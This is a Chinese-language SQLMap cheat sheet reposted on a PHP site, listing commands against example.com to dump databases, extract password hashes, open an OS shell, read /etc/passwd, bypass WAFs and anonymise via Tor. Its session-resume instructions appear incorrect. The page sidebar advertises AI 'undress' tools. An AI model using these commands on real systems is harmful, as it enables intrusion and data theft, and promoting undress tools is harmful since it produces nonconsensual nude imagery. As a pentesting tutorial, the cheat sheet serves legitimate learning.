SQLMap 备忘单:自动 SQL 注入快速指南
作者:Trix Cyrus
什么是 SQLMap?
SQLMap是一个开源渗透测试工具,用于检测和利用Web应用程序中的SQL注入漏洞。它支持各种数据库系统,如 MySQL、PostgreSQL、Oracle、Microsoft SQL Server 等。
基本用法
要开始使用 SQLMap,您可以通过提供目标 URL 以最简单的形式运行它:
sqlmap -u "http://example.com/index.php?id=1"
此命令扫描目标 URL 是否存在 SQL 注入漏洞。
1。检测漏洞
使用以下选项执行基本的漏洞扫描并自动检测 SQL 注入点:
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs:如果发现漏洞,列出目标服务器上所有可用的数据库。
2。指定 POST 请求
对于需要 POST 请求的目标(通常在登录表单中),您可以指定如下数据:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3。绕过 WAF 和过滤器
为了逃避 Web 应用程序防火墙 (WAF),SQLMap 包含有效负载混淆技术:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper:使用篡改脚本来逃避过滤器。示例:space2comment、charencode。
4。提取数据库、表和列
要获取目标系统上的数据库列表:
sqlmap -u "http://example.com/index.php?id=1" --dbs
识别数据库后,提取其表:
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
要从特定表中获取列:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5。转储数据
转储表的内容是 SQLMap 最有用的功能之一。例如,转储特定表中的所有数据:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6。枚举数据库用户和密码
SQLMap 还可以用于枚举数据库用户,甚至破解哈希密码:
sqlmap -u "http://example.com/index.php?id=1" --users sqlmap -u "http://example.com/index.php?id=1" --passwords
7。访问操作系统
在某些情况下,SQLMap可以用来在操作系统上执行命令,特别是当数据库用户具有高级权限时:
sqlmap -u "http://example.com/index.php?id=1" --os-shell
这将提供一个交互式 shell,您可以在其中在目标系统上执行命令。
8。文件上传与读取
您还可以从目标系统读取文件或上传恶意文件(如果允许):
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd" sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9。使用 Tor 进行匿名
要隐藏您的身份,您可以通过 Tor 网络运行 SQLMap:
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor:启用 Tor。
--check-tor:验证是否通过 Tor 建立连接。
10。保存和恢复会话
SQLMap 允许您使用 --session 选项保存和恢复进度:
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
稍后,您可以通过以下方式恢复同一会话:
sqlmap -r your_session_name
11。详细模式
要查看有关 SQLMap 正在执行的操作的详细信息:
sqlmap -u "http://example.com/index.php?id=1" -v 3
-v 选项控制详细程度(级别从 0 到 6,其中 6 显示所有详细信息)。
- 自动扫描多个目标
SQLMap 支持扫描存储在文件中的多个 URL:
sqlmap -m urls.txt --batch
--batch:使用默认选项自动回答所有提示,对于自动扫描很有用。
还可以使用 --risk=3 和 --level=5 来提前扫描
您可以使用此备忘单向读者介绍 SQLMap 的基本命令,并帮助他们开始 SQL 注入测试。
~TrixSec
以上是SQLMap 备忘单:自动 SQL 注入快速指南的详细内容。更多信息请关注PHP中文网其他相关文章!
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
Video Face Swap
使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!
热门文章
热工具
记事本++7.3.1
好用且免费的代码编辑器
SublimeText3汉化版
中文版,非常好用
禅工作室 13.0.1
功能强大的PHP集成开发环境
Dreamweaver CS6
视觉化网页开发工具
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
Python vs.C:申请和用例
Apr 12, 2025 am 12:01 AM
Python适合数据科学、Web开发和自动化任务,而C 适用于系统编程、游戏开发和嵌入式系统。 Python以简洁和强大的生态系统着称,C 则以高性能和底层控制能力闻名。
2小时的Python计划:一种现实的方法
Apr 11, 2025 am 12:04 AM
2小时内可以学会Python的基本编程概念和技能。1.学习变量和数据类型,2.掌握控制流(条件语句和循环),3.理解函数的定义和使用,4.通过简单示例和代码片段快速上手Python编程。
Python:游戏,Guis等
Apr 13, 2025 am 12:14 AM
Python在游戏和GUI开发中表现出色。1)游戏开发使用Pygame,提供绘图、音频等功能,适合创建2D游戏。2)GUI开发可选择Tkinter或PyQt,Tkinter简单易用,PyQt功能丰富,适合专业开发。
您可以在2小时内学到多少python?
Apr 09, 2025 pm 04:33 PM
两小时内可以学到Python的基础知识。1.学习变量和数据类型,2.掌握控制结构如if语句和循环,3.了解函数的定义和使用。这些将帮助你开始编写简单的Python程序。
Python与C:学习曲线和易用性
Apr 19, 2025 am 12:20 AM
Python更易学且易用,C 则更强大但复杂。1.Python语法简洁,适合初学者,动态类型和自动内存管理使其易用,但可能导致运行时错误。2.C 提供低级控制和高级特性,适合高性能应用,但学习门槛高,需手动管理内存和类型安全。
Python和时间:充分利用您的学习时间
Apr 14, 2025 am 12:02 AM
要在有限的时间内最大化学习Python的效率,可以使用Python的datetime、time和schedule模块。1.datetime模块用于记录和规划学习时间。2.time模块帮助设置学习和休息时间。3.schedule模块自动化安排每周学习任务。
Python:探索其主要应用程序
Apr 10, 2025 am 09:41 AM
Python在web开发、数据科学、机器学习、自动化和脚本编写等领域有广泛应用。1)在web开发中,Django和Flask框架简化了开发过程。2)数据科学和机器学习领域,NumPy、Pandas、Scikit-learn和TensorFlow库提供了强大支持。3)自动化和脚本编写方面,Python适用于自动化测试和系统管理等任务。
Python:自动化,脚本和任务管理
Apr 16, 2025 am 12:14 AM
Python在自动化、脚本编写和任务管理中表现出色。1)自动化:通过标准库如os、shutil实现文件备份。2)脚本编写:使用psutil库监控系统资源。3)任务管理:利用schedule库调度任务。Python的易用性和丰富库支持使其在这些领域中成为首选工具。
